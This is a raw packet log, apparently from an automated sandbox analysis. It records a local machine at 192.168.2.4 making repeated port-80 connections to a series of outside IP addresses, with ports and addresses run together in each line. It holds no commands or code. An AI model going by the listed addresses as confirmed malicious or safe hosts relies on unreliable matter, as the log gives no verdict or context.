                                                      Dec 3, 2024 06:54:49.267016888 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:50.368663073 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:50.368751049 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:50.368762016 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:50.368949890 CET4977680192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:50.371443033 CET4977680192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:50.491422892 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:55.873399019 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:55.993355036 CET8049793185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:55.993438005 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:56.005814075 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:56.125901937 CET8049793185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:57.242728949 CET8049793185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:57.242804050 CET8049793185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:57.242856026 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:57.514556885 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:58.536803007 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:58.656794071 CET8049801185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:58.656873941 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:58.670360088 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:58.790397882 CET8049801185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:59.951869011 CET8049801185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:59.951994896 CET8049801185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:59.952151060 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:00.186577082 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:01.204765081 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:01.324784994 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.324995041 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:01.337131023 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:01.457190990 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457242012 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457328081 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457364082 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457437038 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457470894 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457487106 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457505941 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457515001 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:02.622072935 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:02.622208118 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:02.622282028 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:02.842816114 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:03.861325026 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:03.981264114 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:03.981463909 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:03.990909100 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:04.111037970 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:05.230115891 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:05.230159044 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:05.230253935 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:05.232871056 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:05.353441000 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:11.599803925 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:11.719916105 CET8049833106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:11.720071077 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:11.740147114 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:11.860726118 CET8049833106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:13.249034882 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:13.369199991 CET8049833106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:13.369260073 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:14.267214060 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:14.387238979 CET8049839106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:14.387330055 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:14.402816057 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:14.523427010 CET8049839106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:15.905246019 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:16.025541067 CET8049839106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:16.025594950 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:16.923516035 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:17.043486118 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.043709993 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:17.057569027 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:17.177867889 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.177886009 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.177959919 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.177987099 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178083897 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178100109 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178222895 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178232908 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178260088 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:18.561670065 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:18.682050943 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:18.682131052 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:19.580080032 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:19.700156927 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:19.701606989 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:19.709201097 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:19.829268932 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370456934 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370481014 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370492935 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370587111 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.370634079 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370646954 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370659113 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370670080 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370680094 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.370692015 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.370727062 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.375252962 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.495122910 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:30.008497953 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:30.128842115 CET804987845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:30.128972054 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:30.143064976 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:30.262993097 CET804987845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:31.485246897 CET804987845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:31.485354900 CET804987845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:31.485415936 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:31.655334949 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:32.673402071 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:32.793349028 CET804988545.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:32.793428898 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:32.805386066 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:32.925352097 CET804988545.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:34.106460094 CET804988545.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:34.106576920 CET804988545.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:34.106621981 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:34.311690092 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:35.330172062 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:35.450126886 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.450229883 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:35.462796926 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:35.582904100 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.582914114 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.582953930 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.582972050 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.582986116 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.583072901 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.583086014 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.583205938 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.583214998 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:36.784461021 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:36.827131987 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:36.908219099 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:36.908268929 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:36.967853069 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:37.993747950 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:38.114120007 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:38.114209890 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:38.123507977 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:38.243422985 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:39.512082100 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:39.512331963 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:39.512378931 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:39.514486074 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:39.634340048 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:45.240114927 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:45.360025883 CET804991623.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:45.360105038 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:45.372932911 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:45.493299007 CET804991623.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:46.571362972 CET804991623.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:46.624044895 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:46.644608021 CET804991623.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:46.644782066 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:46.884219885 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:47.892529011 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:48.015373945 CET804992223.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:48.015475035 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:48.029781103 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:48.150557041 CET804992223.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:49.212785006 CET804992223.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:49.264702082 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:49.283982038 CET804992223.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:49.284099102 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:49.549072027 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:50.564711094 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:50.684602022 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.684787989 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:50.698746920 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:50.818772078 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818799973 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818902016 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818912029 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818943977 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818953037 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.819053888 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.819063902 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.819097996 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:51.881123066 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:51.936569929 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:51.948946953 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:51.949013948 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:52.203569889 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:53.221425056 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:53.341540098 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:53.341645956 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:53.350812912 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:53.470740080 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:54.586163044 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:54.639699936 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:54.656505108 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:54.656603098 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:54.659619093 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:54.779649973 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:56:00.058098078 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:00.178118944 CET8049953172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:00.178195000 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:00.190475941 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:00.310336113 CET8049953172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:01.702394962 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:01.822707891 CET8049953172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:01.822786093 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:02.721461058 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:02.841449976 CET8049959172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:02.842916965 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:02.857264042 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:02.977219105 CET8049959172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:04.358645916 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:04.479209900 CET8049959172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:04.479293108 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:05.377161980 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:05.497133970 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.497237921 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:05.511126041 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:05.631156921 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631200075 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631256104 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631300926 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631347895 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631371021 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631479979 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631489992 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631515980 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:07.015799046 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:07.136001110 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:07.136054993 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:08.033955097 CET4997180192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:08.154021978 CET8049971172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:08.155400038 CET4997180192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:08.170773983 CET4997180192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:08.290687084 CET8049971172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:10.202681065 CET8049971172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:10.202702999 CET8049971172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:10.202817917 CET4997180192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:10.203730106 CET8049971172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:10.207339048 CET4997180192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:10.208237886 CET4997180192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:10.328195095 CET8049971172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:15.729088068 CET4998980192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:15.964514971 CET804998913.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:15.964632988 CET4998980192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:15.984447002 CET4998980192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:16.104440928 CET804998913.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:17.109770060 CET804998913.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:17.109848022 CET4998980192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:17.499345064 CET4998980192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:17.619374990 CET804998913.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:18.518222094 CET4999780192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:18.638115883 CET804999713.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:18.638186932 CET4999780192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:18.655059099 CET4999780192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:18.775233030 CET804999713.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:19.737071037 CET804999713.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:19.737448931 CET4999780192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:20.171174049 CET4999780192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:20.292370081 CET804999713.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.190046072 CET5000480192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:21.310161114 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.310396910 CET5000480192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:21.325094938 CET5000480192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:21.445164919 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.445178986 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.445236921 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.445245981 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.445337057 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.445346117 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.445357084 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.445401907 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:21.445455074 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:22.506912947 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:22.506999969 CET5000480192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:22.827370882 CET5000480192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:22.947232008 CET805000413.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:23.846153975 CET5001180192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:23.966428995 CET805001113.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:23.966650009 CET5001180192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:23.976130962 CET5001180192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:24.096321106 CET805001113.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:25.157572985 CET805001113.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:25.157670021 CET805001113.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:25.157717943 CET5001180192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:25.160360098 CET5001180192.168.2.413.248.169.48
                                                      Dec 3, 2024 06:56:25.280319929 CET805001113.248.169.48192.168.2.4
                                                      Dec 3, 2024 06:56:30.605834961 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:30.725820065 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:30.725899935 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:30.740322113 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:30.861100912 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052464962 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052531958 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052546024 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052586079 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.052683115 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052732944 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.052746058 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052858114 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052867889 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052877903 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052886009 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052895069 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.052907944 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.052953959 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.173650026 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.173662901 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.173728943 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.177680969 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.218107939 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.249316931 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.263092041 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.263113022 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.263202906 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.263202906 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:32.265629053 CET8050027203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:32.265686989 CET5002780192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:33.268234015 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:33.390620947 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:33.390722990 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:33.402578115 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:33.523256063 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716044903 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716110945 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716126919 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716160059 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:34.716269016 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716279030 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716288090 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716298103 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716306925 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716316938 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:34.716348886 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:34.716556072 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716566086 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.716604948 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:34.836123943 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.836189032 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.836236954 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:34.840342999 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.889826059 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:34.905512094 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:34.926367044 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.926417112 CET5003480192.168.2.4203.161.42.73
